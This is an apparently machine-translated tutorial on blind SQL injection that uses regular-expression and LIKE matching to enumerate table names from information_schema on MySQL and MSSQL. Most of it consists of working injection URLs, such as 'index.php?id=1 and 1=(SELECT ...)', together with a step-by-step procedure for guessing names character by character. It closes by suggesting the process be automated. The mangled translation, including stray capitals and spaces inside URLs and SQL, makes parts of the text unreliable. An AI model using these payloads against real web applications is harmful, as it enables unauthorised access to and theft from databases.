SQL blind injection-Regular Expression attack

----------------------------------------- MYSQL 5 + -----------------------------------------

We all know that all database names and field names are stored in the information_schema database of MYSQL 5 +. The usage is as follows:

1. Determine whether the first character of the first table name is a character in a-z. blind_sqli is a known database name.

Note: In the regular expression, ^ [a-z] indicates that the starting character in the string is within the range of a-z.

Index. php? Id = 1 and 1 = (SELECT 1 FROM information_schema.tables WHERE TABLE_SCHEMA = "blind_sqli" AND table_name REGEXP ^ [a-z] LIMIT 0, 1 )/*

2. Determine whether the first character is a character in a-n.

Www.2cto.com/index.php? Id = 1 and 1 = (SELECT 1 FROM information_schema.tables WHERE TABLE_SCHEMA = "blind_sqli" AND table_name REGEXP ^ [a-n] LIMIT 0, 1 )/*

3. confirm that the character is n

Index. php? Id = 1 and 1 = (SELECT 1 FROM information_schema.tables WHERE TABLE_SCHEMA = "blind_sqli" AND table_name REGEXP ^ n LIMIT 0, 1 )/*

4. Replace the expression as follows:

Expression like this: ^ n [a-z]-> ^ ne [a-z]-> ^ new [a-z]-> ^ news [a-z]-> FALSE

In this case, the table name is news. to verify whether the regular expression is ^ news $, you do not need to directly judge table_name = 'News.

5. Then, you can guess other tables. You only need to modify limit-> limit to perform blind injection on the following tables.

----------------------------------------------- MSSQL ---------------------------------------------------

The regular expression used by MSSQL is not a standard regular expression. This expression uses the like keyword.

Default. asp? Id = 1 AND 1 = (select top 1 1 FROM information_schema.tables WHERE TABLE_SCHEMA = "blind_sqli" and table_name LIKE [a-z] %)

In this query statement, select top 1 is a combination.

If you want to query other table names, you can only use table_name not in (select top x table_name from information_schema.tables) Because limit x and 1 cannot be used like mysql. The meaning is: the table name is not in the first row x, but the row x + 1 is actually queried.

For example, to query the table name in the second row:

Default. asp? Id = 1 AND 1 = (select top 1 1 FROM information_schema.tables WHERE TABLE_SCHEMA = "blind_sqli" and table_name not in (select top 1 table_name FROM information_schema.tables) and table_name LIKE [a-z] %)

Expression order:

N [a-z] %-> ne [a-z] %-> new [a-z] %-> news [a-z] %-> TRUE

The correct result returned after the expression news [a-z] is "%", which represents 0-n characters, and "_" can only represent one character. Therefore, check whether there are other characters in the future and use the following expression:

News % TRUE-> news _ FALSE

Similarly, you can use the same method to obtain fields and values. I will not describe it in detail here.

Ps: blind injection is a physical activity, but I understand the principle. programmers can consider implementing a software!